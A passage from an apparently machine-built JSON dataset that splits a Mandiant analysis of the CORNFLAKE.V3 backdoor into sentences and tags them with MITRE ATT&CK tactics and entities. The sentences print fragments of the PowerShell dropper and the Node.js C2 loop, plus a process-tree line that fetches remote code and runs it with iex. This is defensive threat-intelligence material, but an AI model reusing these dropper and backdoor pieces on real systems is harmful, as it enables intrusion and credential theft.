[System.IO.Path]::Combine($env:TEMP, \"downloaded.zip\")\n# Download the Node.js zip file.", "sentence_text": "iwr -Uri $ZipURL -OutFile $ZipFile # Try block for file extraction using COM objects.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s36-421008", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "iwr -Uri $ZipURL -OutFile $ZipFile # Try block for file extraction using COM objects.", "sentence_text": "try {\n$Shell = New-Object -ComObject Shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s37-0c2b4f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "try {\n$Shell = New-Object -ComObject Shell.", "sentence_text": "Application $ZIP = $Shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s38-7ffa7d", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "Application $ZIP = $Shell.", "sentence_text": "NameSpace($ZipFile)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s39-70d995", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "NameSpace($ZipFile)", "sentence_text": "$Destination = $Shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s40-3c89b5", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "$Destination = $Shell.", "sentence_text": "NameSpace($DestinationFolder)\n# Copy/extract contents silently.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s41-d0ac5f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "NameSpace($DestinationFolder)\n# Copy/extract contents silently.", "sentence_text": "$Destination.CopyHere($ZIP.Items(), 20)\n}\n# Exit on any extraction error.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s42-1a8546", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "$Destination.CopyHere($ZIP.Items(), 20)\n}\n# Exit on any extraction error.", "sentence_text": "catch {\nexit 0\n}\n# Update destination path to the extracted Node.js folder.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s43-5fde89", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "catch {\nexit 0\n}\n# Update destination path to the extracted Node.js folder.", "sentence_text": "$DestinationFolder = [System.IO.Path]::Combine($DestinationFolder, \"node-v22.11.0-win-x64\")\n# Base64 encoded payload (large blob containing the CORNFLAKE.V3 sample).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s44-1b1239", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "$DestinationFolder = [System.IO.Path]::Combine($DestinationFolder, \"node-v22.11.0-win-x64\")\n# Base64 encoded payload (large blob containing the CORNFLAKE.V3 sample).", "sentence_text": "$BASE64STRING = # Decode the Base64 string.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s45-3e0967", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "$BASE64STRING = # Decode the Base64 string.", "sentence_text": "$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)\n# Convert decoded bytes to a string (the payload code).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s46-28a241", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)\n# Convert decoded bytes to a string (the payload code).", "sentence_text": "$StringData = [System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s48-b036eb", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "Text.", "sentence_text": "Encoding]::UTF8.GetString($BINARYDATA)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s49-3e7496", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "Encoding]::UTF8.GetString($BINARYDATA)", "sentence_text": "# Path to the extracted node.exe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s50-8bd0ec", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "# Path to the extracted node.exe.", "sentence_text": "$Node = [System.IO.Path]::Combine($DestinationFolder, \"node.exe\")\n# Start node.exe to execute the decoded string data as JavaScript, hidden.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Execute decoded payload via node.exe.", "entities": [ { "text": "Start node.exe to execute the decoded string data", "start": 68, "end": 117, "label": "Action" }, { "text": "node.exe", "start": 74, "end": 82, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s51-f47a14", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "$Node = [System.IO.Path]::Combine($DestinationFolder, \"node.exe\")\n# Start node.exe to execute the decoded string data as JavaScript, hidden.", "sentence_text": "start-process -FilePath \"$Node\" -ArgumentList \"-e `\"$StringData`\"\" -WindowStyle Hidden The PowerShell dropper’s execution includes multiple steps:\nCheck if it is running inside a virtual machine and, if true, exit Download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip , write the file to %TEMP%\\downloaded.zip and extract its contents to the directory %APPDATA%\\node-v22.11.0-win-x64 Base64 decode its embedded CORNFLAKE.V3 payload and execute it via the command %APPDATA%\\node-v22.11.0-win-x64\\node.exe -e", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "PowerShell dropper downloads Node.js, decodes embedded CORNFLAKE.V3 payload, and executes it using node.exe", "entities": [ { "text": "CORNFLAKE.V3", "start": 458, "end": 470, "label": "MalwareTool" }, { "text": " hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip", "start": 253, "end": 314, "label": "Infrastructure_Indicator" }, { "text": "write the file to", "start": 317, "end": 334, "label": "Action" }, { "text": " embedded CORNFLAKE.V3 payload and execute it via the command", "start": 448, "end": 509, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s52-627062", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "start-process -FilePath \"$Node\" -ArgumentList \"-e `\"$StringData`\"\" -WindowStyle Hidden The PowerShell dropper’s execution includes multiple steps:\nCheck if it is running inside a virtual machine and, if true, exit Download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip , write the file to %TEMP%\\downloaded.zip and extract its contents to the directory %APPDATA%\\node-v22.11.0-win-x64 Base64 decode its embedded CORNFLAKE.V3 payload and execute it via the command %APPDATA%\\node-v22.11.0-win-x64\\node.exe -e", "sentence_text": "“”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s53-355561", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "“”", "sentence_text": "The PowerShell dropper's anti-vm checks include checking for low system resources (total memory less than 4GB or used memory less than 1.5GB) and if the target system's computer name matches the regular expression DESKTOP-S* or the target system's manufacturer is QEMU As a result of the dropper’s execution, a DNS query for the nodejs[.]org domain was made, followed by the download of an archive named downloaded.zip ( SHA256:\n905373a059aecaf7f48c1ce10ffbd5334457ca00f678747f19db5ea7d256c236\n)\n.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s54-b6b2d8", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "The PowerShell dropper's anti-vm checks include checking for low system resources (total memory less than 4GB or used memory less than 1.5GB) and if the target system's computer name matches the regular expression DESKTOP-S* or the target system's manufacturer is QEMU As a result of the dropper’s execution, a DNS query for the nodejs[.]org domain was made, followed by the download of an archive named downloaded.zip ( SHA256:\n905373a059aecaf7f48c1ce10ffbd5334457ca00f678747f19db5ea7d256c236\n)\n.", "sentence_text": "This archive contained the Node.js runtime environment, including its executable file node.exe , which was then extracted to %APPDATA%\\node-v22.11.0-win-x64\\ .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s55-4b7146", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "This archive contained the Node.js runtime environment, including its executable file node.exe , which was then extracted to %APPDATA%\\node-v22.11.0-win-x64\\ .", "sentence_text": "The Node.js environment allows for the execution of JavaScript code outside of a web browser.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s56-14b200", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "The Node.js environment allows for the execution of JavaScript code outside of a web browser.", "sentence_text": "The extracted\n%APPDATA%\\node-v22.11.0-win-x64\\node.exe\nbinary was then launched by Powershell with the -e argument, followed by a large Node.js script, a CORNFLAKE.V3 backdoor sample.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "PowerShell launches node.exe with the -e argument to execute a CORNFLAKE.V3 backdoor script", "entities": [ { "text": " CORNFLAKE.V3", "start": 153, "end": 166, "label": "MalwareTool" }, { "text": "%APPDATA%\\node-v22.11.0-win-x64\\node.exe", "start": 14, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "launched ", "start": 71, "end": 80, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s57-854c9e", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "The extracted\n%APPDATA%\\node-v22.11.0-win-x64\\node.exe\nbinary was then launched by Powershell with the -e argument, followed by a large Node.js script, a CORNFLAKE.V3 backdoor sample.", "sentence_text": "Host and AD-based reconnaissance Persistence via Registry Run key Credential harvesting attempts via Kerberoasting The following process tree was observed during the investigation:\nexplorer.exe\n↳ c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe\n-w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex\" ↳ c:\\users\\\\appdata\\roaming\\node-v22.11.0-win-x64\\node.exe -e \"{CORNFLAKE.V3}\" ↳ c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -c \"{Initial check and System Information Collection}\" ↳ C:\\Windows\\System32\\ARP.EXE -a ↳ C:\\Windows\\System32\\chcp.com 65001 ↳", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1087", "name": "Account Discovery" }, { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" }, { "id": "T1558.003", "name": "Kerberoasting" } ], "procedure": "Perform reconnaissance, persistence, and credential harvesting via Kerberoasting.", "entities": [ { "text": "Host and AD-based reconnaissance", "start": 0, "end": 32, "label": "Action" }, { "text": "Persistence via Registry Run key", "start": 33, "end": 65, "label": "Action" }, { "text": "Credential harvesting attempts via Kerberoasting", "start": 66, "end": 114, "label": "Action" }, { "text": "Registry Run key", "start": 49, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "Kerberoasting", "start": 101, "end": 114, "label": "Action" }, { "text": "CORNFLAKE.V3", "start": 459, "end": 471, "label": "MalwareTool" }, { "text": "138.199.161[.]141:8080", "start": 358, "end": 380, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s58-02ae23", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "Host and AD-based reconnaissance Persistence via Registry Run key Credential harvesting attempts via Kerberoasting The following process tree was observed during the investigation:\nexplorer.exe\n↳ c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe\n-w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex\" ↳ c:\\users\\\\appdata\\roaming\\node-v22.11.0-win-x64\\node.exe -e \"{CORNFLAKE.V3}\" ↳ c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -c \"{Initial check and System Information Collection}\" ↳ C:\\Windows\\System32\\ARP.EXE -a ↳ C:\\Windows\\System32\\chcp.com 65001 ↳", "sentence_text": "C:\\Windows\\System32\\systeminfo.exe ↳ C:\\Windows\\System32\\tasklist.exe /svc ↳ c:\\windows\\system32\\cmd.exe /d /s /c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s59-95ee5e", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "C:\\Windows\\System32\\systeminfo.exe ↳ C:\\Windows\\System32\\tasklist.exe /svc ↳ c:\\windows\\system32\\cmd.exe /d /s /c", "sentence_text": "\"wmic process where processid=16004 get commandline\" ↳ C:\\Windows\\System32\\cmd.exe /d /s /c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s60-e90d0b", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "\"wmic process where processid=16004 get commandline\" ↳ C:\\Windows\\System32\\cmd.exe /d /s /c", "sentence_text": "\"{Kerberoasting}\" ↳ c:\\windows\\system32\\cmd.exe /d /s /c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s61-ae60e5", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "\"{Kerberoasting}\" ↳ c:\\windows\\system32\\cmd.exe /d /s /c", "sentence_text": "\"{Active Directory Reconnaissance}\" ↳ c:\\windows\\system32\\cmd.exe /d /s /c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s62-d6fbb2", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "\"{Active Directory Reconnaissance}\" ↳ c:\\windows\\system32\\cmd.exe /d /s /c", "sentence_text": "\"reg add {ChromeUpdater as Persistence}\" Analysis of CORNFLAKE.V3 The CORNFLAKE.V3 sample recovered in our investigation was completely unobfuscated, which allowed us to statically analyze it in order to understand its functionality.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Add registry key for persistence.", "entities": [ { "text": "reg add", "start": 1, "end": 8, "label": "Action" }, { "text": "ChromeUpdater", "start": 10, "end": 23, "label": "Infrastructure_Indicator" }, { "text": "CORNFLAKE.V3", "start": 53, "end": 65, "label": "MalwareTool" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s63-41c0fe", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "\"reg add {ChromeUpdater as Persistence}\" Analysis of CORNFLAKE.V3 The CORNFLAKE.V3 sample recovered in our investigation was completely unobfuscated, which allowed us to statically analyze it in order to understand its functionality.", "sentence_text": "This section describes the primary functions of the malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s64-ab1ca6", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "This section describes the primary functions of the malware.", "sentence_text": "Initial Check and System Information Collection if (process.argv[1] !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s65-192c7e", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "Initial Check and System Information Collection if (process.argv[1] !", "sentence_text": "== undefined && process.argv[2]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s66-83ab86", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "== undefined && process.argv[2]", "sentence_text": "=== undefined) { const child = spawn(process.argv[0], [process.argv[1], '1'], { detached: true, stdio: 'ignore', windowsHide: true, });\nchild.unref();\nprocess.exit(0);\n}\nWhen the script initially executes, a check verifies the command line arguments of the node.exe process, keeping in mind that the binary is initially spawned with a single argument (the script itself), this check forces the script to create a child process which has as an additional argument, then the initial node.exe exits.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s67-5e3738", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "=== undefined) { const child = spawn(process.argv[0], [process.argv[1], '1'], { detached: true, stdio: 'ignore', windowsHide: true, });\nchild.unref();\nprocess.exit(0);\n}\nWhen the script initially executes, a check verifies the command line arguments of the node.exe process, keeping in mind that the binary is initially spawned with a single argument (the script itself), this check forces the script to create a child process which has as an additional argument, then the initial node.exe exits.", "sentence_text": "This check allows the malware to ensure that only one instance of the script is executing at one time, even if it is launched multiple times due to its persistence mechanisms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s68-374353", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "This check allows the malware to ensure that only one instance of the script is executing at one time, even if it is launched multiple times due to its persistence mechanisms.", "sentence_text": "Following this, the malware attempts to collect system information using the following code:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s69-8b23be", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "Following this, the malware attempts to collect system information using the following code:", "sentence_text": "if ([Security.Principal.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s70-31bece", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "if ([Security.Principal.", "sentence_text": "WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { \\'Runas: System\\' } elseif (([Security.Principal.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s71-3dc11f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { \\'Runas: System\\' } elseif (([Security.Principal.", "sentence_text": "WindowsPrincipal]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s72-dd7ad7", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "WindowsPrincipal]", "sentence_text": "[Security.Principal.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s73-58be88", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "[Security.Principal.", "sentence_text": "WindowsIdentity]::GetCurrent()).IsInRole\n([Security.Principal.WindowsBuiltInRole]::Administrator))\n{ \\'Runas: Admin\\' } else { \\'Runas: User\\' } ; systeminfo ; echo \\'=-=-=-=-=-\\' ;", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s74-547e0a", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "WindowsIdentity]::GetCurrent()).IsInRole\n([Security.Principal.WindowsBuiltInRole]::Administrator))\n{ \\'Runas: Admin\\' } else { \\'Runas: User\\' } ; systeminfo ; echo \\'=-=-=-=-=-\\' ;", "sentence_text": "tasklist /svc ; echo \\'=-=-=-=-=-\\' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ;\necho \\'=-=-=-=-=-\\' ; Get-PSDrive -PSProvider FileSystem | Format-Table -AutoSize ; echo \\'=-=-=-=-=-\\' ; arp -a', { encoding: 'utf-8', shell:\n'powershell.exe', windowsHide: true });\ncommandRet = Buffer.from(cmd, 'utf-8');\nsysinfo = Buffer.concat([numberBufferInit, numberBufferId, commandRet]);", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s75-0d11a0", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "tasklist /svc ; echo \\'=-=-=-=-=-\\' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ;\necho \\'=-=-=-=-=-\\' ; Get-PSDrive -PSProvider FileSystem | Format-Table -AutoSize ; echo \\'=-=-=-=-=-\\' ; arp -a', { encoding: 'utf-8', shell:\n'powershell.exe', windowsHide: true });\ncommandRet = Buffer.from(cmd, 'utf-8');\nsysinfo = Buffer.concat([numberBufferInit, numberBufferId, commandRet]);", "sentence_text": "This code block executes a series of PowerShell commands (or fallback CMD commands if PowerShell fails) using execSync .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s76-0c9275", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "This code block executes a series of PowerShell commands (or fallback CMD commands if PowerShell fails) using execSync .", "sentence_text": "C2 Initialization", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s77-05dcc6", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "C2 Initialization", "sentence_text": "After setting some logical constants and the command and control (C2) server IP address, the malware enters the mainloop function.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s78-96df85", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "After setting some logical constants and the command and control (C2) server IP address, the malware enters the mainloop function.", "sentence_text": "The script contains support for two separate lists, hosts and hostsIP , which are both used in the C2 communication logic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s79-2f9bdd", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "The script contains support for two separate lists, hosts and hostsIP , which are both used in the C2 communication logic.", "sentence_text": "Once a connection is successfully established, the main function is called.\n//", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s80-4cddd9", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "Once a connection is successfully established, the main function is called.\n//", "sentence_text": "Define lists of hostnames and IP addresses for the command and control server.\nconst hosts = ['159.69.3[.]151'];\nconst hostsIp = ['159.69.3[.]151'];\n// Variables to manage the connection and retry logic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s81-a7ef1f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "Define lists of hostnames and IP addresses for the command and control server.\nconst hosts = ['159.69.3[.]151'];\nconst hostsIp = ['159.69.3[.]151'];\n// Variables to manage the connection and retry logic.", "sentence_text": "let useIp = 0;\nlet delay = 1;\n// Main loop to continuously communicate with the command and control server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s82-4cf62f", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "let useIp = 0;\nlet delay = 1;\n// Main loop to continuously communicate with the command and control server.", "sentence_text": "async function mainloop() { let toHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];\nlet toIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];\nwhile (true) { // Wait for the specified delay.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s83-49a986", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "async function mainloop() { let toHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];\nlet toIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];\nwhile (true) { // Wait for the specified delay.", "sentence_text": "await new Promise((resolve)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s84-e8ea83", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "await new Promise((resolve)", "sentence_text": "=> setTimeout(resolve, delay));\ntry {\n// Attempt to communicate with the command and control server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s85-b1213d", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 85, "context_before": "=> setTimeout(resolve, delay));\ntry {\n// Attempt to communicate with the command and control server.", "sentence_text": "console.error('Error with HTTP request:', error.message);\ntoHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];\ntoIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];\nuseIp++;\ndelay = 1000 * 10;\ncontinue;\n}\n// Set the delay for the next attempt.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s86-ed9ac7", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "console.error('Error with HTTP request:', error.message);\ntoHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];\ntoIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];\nuseIp++;\ndelay = 1000 * 10;\ncontinue;\n}\n// Set the delay for the next attempt.", "sentence_text": "delay = 1000 * 60 * 5;\n}\n}\nC2 Communication\nThis function, named main , handles the main command and control logic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s87-088522", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "delay = 1000 * 60 * 5;\n}\n}\nC2 Communication\nThis function, named main , handles the main command and control logic.", "sentence_text": "It takes a host and port number as arguments, and constructs the data to be sent to the C2 server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-23_mandiant_report-p1-s88-72c375", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "It takes a host and port number as arguments, and constructs the data to be sent to the C2 server.", "sentence_text": "The malware sends an initial POST request to the path /init1234 , which contains information about the infected system and the output of the last executed command; the contents of this request are XOR-encrypted by the enc function.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Send an initial POST request to /init1234 containing infected system information and the output of the last executed command, with request contents XOR-encrypted.", "entities": [ { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "sends an initial POST request to the path /init1234", "start": 12, "end": 63, "label": "Action" }, { "text": "/init1234", "start": 54, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "contains information about the infected system and the output of the last executed command", "start": 72, "end": 162, "label": "Action" }, { "text": "are XOR-encrypted by the enc function", "start": 193, "end": 230, "label": "Action" } ] }, { "uid": "mandiant-23_mandiant_report-p1-s89-c49f92", "source": "mandiant", "doc_id": "23_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "The malware sends an initial POST request to the path /init1234 , which contains information about the infected system and the output of the last executed command; the contents of this request are XOR-encrypted by the enc function.", "sentence_text": "This request is answered by the C2 with 2 possible responses:\nooff\n- the process exits atst - the atst function is called, which establishes persistence on the host If the response does not match one of the aforementioned 2 values, the malware interprets the response as a payload and parses the last byte of the response after XOR decrypting it.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Receive commands and establish persistence via C2 response.", "entities": [ { "text": "interprets the response as a payload", "start": 244, "end": 280, "label": "Action" }, { "text": 